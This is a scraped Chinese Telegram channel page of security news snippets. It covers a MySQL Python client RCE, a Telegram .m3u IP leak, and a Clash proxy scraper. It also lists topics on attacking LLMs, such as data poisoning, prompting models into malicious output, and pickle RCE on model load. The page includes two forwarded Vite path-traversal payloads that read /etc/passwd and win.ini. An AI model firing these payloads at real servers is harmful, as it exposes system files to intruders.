Puddin在TG上看到了啥
782 subscribers
1.67K photos
70 videos
87 files
2.43K links
会把想要收藏的东西堆在这里
#日常 #数码 #科技 #渗透 #碎碎念
Download Telegram
mysql的python客户端rce CVE-2025-21548

论为什么python里到处都是eval

https://mp.weixin.qq.com/s/h3qOUrzhANfDJ0PuAJyc6w
telegram 带有 .m3u 扩展名的消息可能会泄露您的 IP(Telegram 桌面版/Windows)。Telegram 对 .m3u8 发出警告(“打开此文件可能会暴露您的 IP 地址...”),但对 .m3u 则不发出警告。
注意:.m3u 是一种简单的基于文本的播放列表格式
#威胁情报 #好文推荐
Puddin在TG上看到了啥
搞了一个免费的clash翻墙订阅,自动从网上爬取能用的clash代理,选取速度最快的发在Github上,每30分钟更新一次( https://github.com/PuddinCat/BestClash
跑了一天,代理质量还是不错的,就是我的电脑内存爆了

而且还发现python的一个bug,就是python的with语句会影响异步上下文的切换,然后就会让本来应该异步运行的函数卡住
1
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from Eternal_安全内参
/@fs/etc/passwd?import&?inline=1.wasm?init
/@fs/C://windows/win.ini?import&?inline=1.wasm?init
所以即使一点都不懂网安也可以办比赛,开课程,趁着比赛泡妹子
然后CISCN不是只有初赛是线上的吗,一个初赛能装什么B...
This media is not supported in your browser
VIEW IN TELEGRAM
java是一个byte可以为负数的语言
byte a = -121;
System.out.println(a);
1. 污染训练数据+prompt欺骗生成恶意内容+在模型参数低位隐写数据+修改模型参数影响模型运行结果
2. 通过pickle反序列化等实现加载模型时RCE,使用eBPF监测修改模型文件等恶意行为
3. 用大模型检测日志
4. 总结了一下LLM相关的安全问题
5. 如何让大模型生成恶意内容
6. 总结了一些漏洞挖掘的知识


说有用吧好像又没用,说没用吧好像也有点用
Forwarded from Eternal_安全内参
从CVE-2025-30208看任意文件读取利用 - AabyssZG's Blog
https://blog.zgsec.cn/archives/713.html